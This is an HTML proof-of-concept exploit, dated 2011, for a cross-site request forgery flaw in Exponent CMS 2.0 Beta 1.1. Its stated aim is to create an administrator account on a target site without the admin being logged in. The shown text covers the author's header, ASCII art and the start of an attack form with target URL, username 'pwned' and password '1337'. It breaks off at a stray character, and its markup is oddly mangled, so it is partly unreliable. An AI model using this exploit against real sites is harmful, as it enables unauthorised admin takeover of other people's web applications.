<! --
[+] Title: Exponent CMS 2.0 Beta 1.1 CSRF Add Administrator Account PoC
[+] Version: 2.0 Beta 1.1 (not tested with older versions)
[+] Note: No need administrator to be logged (:
[+] Tested on: Linux Ubuntu 11.04 (Google Chrome) but will work in any other OS
[+] Download URL: https://github.com/downloads/exponentcms/exponent-cms/exponent-2.0.0-beta1.1.zip
[+] Date: 02.05.2011
[+] Author: outlaw. dll
GreetZ to all bitcheZ in the world! = P
W_o.O_W
-->
<Html>
<Head>
<Title> Exponent CMS 2.0 Beta 1.1 CSRF Add Administrator Account PoC by outlaw. dll </title>
<Style type = "text/css">
Body, table, tr, td
{
Background-color: # 00489C;
Font-family: Verdana;
Font-size: 16px;
Color: # FFFFFF;
}
</Style>
</Head>
<Body>
<Pre>
.-""""-..-""""-.
//
/__/__
///\///\
| \__/_/| |\__/_/|
|/
//
__/__/
.-""""-..__..-""""-..__..-""""-.
/|/
/_ | /__
///\///\///\
| \__/_/| |\__/_/|
|/
///
__/__/__/
.__..__..__.
|
|
</Pre>
Exponent CMS 2.0 Beta 1.1 CSRF Add Administrator Account PoC by outlaw. dll
<Br/>
<Form name = "exploit">
<Table border = "0">
<Tr>
<Td width = "150" align = "right"> Target URL: </td>
<Td width = "400"> <input type = "text" name = "targetURL" value = "http://www.bkjia.com/exponent/index.php" size = "30"/> </td>
</Tr>
<Tr>
<Td width = "150" align = "right"> Username: </td>
<Td width = "400"> <input type = "text" name = "username" value = "pwned" size = "30"/> </td>
</Tr>
<Tr>
<Td width = "150" align = "right"> Password: </td>
<Td width = "400"> <input type = "text" name = "password" value = "1337" size = "30"/> </td>
</Tr>
&